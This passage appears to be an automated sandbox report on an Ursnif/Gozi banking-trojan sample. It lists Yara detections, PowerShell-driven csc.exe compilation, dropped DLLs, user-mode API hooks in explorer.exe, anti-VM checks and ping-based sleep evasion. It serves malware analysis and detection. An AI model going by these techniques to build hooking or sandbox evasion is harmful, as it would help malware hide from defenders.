Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hscan34n.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5n300s0s.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hscan34n.cmdline	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5n300s0s.cmdline	Jump to behavior

Source: initial sample

Static PE information: section name: .text entropy: 7.33101766252

Persistence and Installation Behavior:

Drops PE files

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\5n300s0s.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\hscan34n.dll			Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Source: Yara match	File source: 0000001C.00000003.532875532.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392490032.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.826395409.00000163C5A02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.672226246.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.671882459.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392591901.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.473440748.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.671987567.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392517903.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.541235990.0000020FDF04C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.672047552.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392607938.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.671936053.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.473486452.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.540930276.0000020FDF04C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.457301811.00000000043A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392570642.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.672143247.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.473394409.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.541170125.0000020FDF04C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.473504593.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.825382176.000001B91FF02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.405030349.000000000320C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392542209.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.395416668.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.672170468.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000002.673705435.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.543904492.0000020FDF04C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 5696, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: control.exe PID: 5676, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 4364, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4084, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4176, type: MEMORYSTR
Source: Yara match	File source: 8.3.RegAsm.exe.330a4a0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.RegAsm.exe.330a4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.RegAsm.exe.33b8f40.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.RegAsm.exe.33894a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000024.00000000.539555209.0000020FDEA80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000000.652250920.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.568184534.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.609566601.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.468518313.0000000000E50000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.523377381.000000000308F000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.563482706.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.615563963.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000000.655957739.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000000.648045274.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.470699283.0000000000E50000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.537792307.0000020FDEA80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.572793373.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.398744797.0000000003389000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.472358807.0000000000E50000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.535827896.0000020FDEA80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.824135960.00000163C5171000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000002.819337222.000001EAE4571000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.621795530.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.542236121.0000000000E51000.00000020.00020000.sdmp, type: MEMORY

Hooks registry keys query functions (used to hide registry keys)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW

Modifies the export address table of user mode modules (user mode EAT hooks)

Source: explorer.exe

IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFC8BAF521C

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00

Modifies the import address table of user mode modules (user mode IAT hooks)

Source: explorer.exe

EAT of a user mode module has changed: module: WININET.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFC8BAF5200

Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: powershell.exe PID: 6536, type: MEMORYSTR

Uses ping.exe to sleep

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 5

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\gozi.exe TID: 6140	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe TID: 7076	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3540	Thread sleep count: 59 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3540	Thread sleep count: 78 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3540	Thread sleep count: 41 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3540	Thread sleep count: 93 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1304	Thread sleep time: -90000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2268	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior

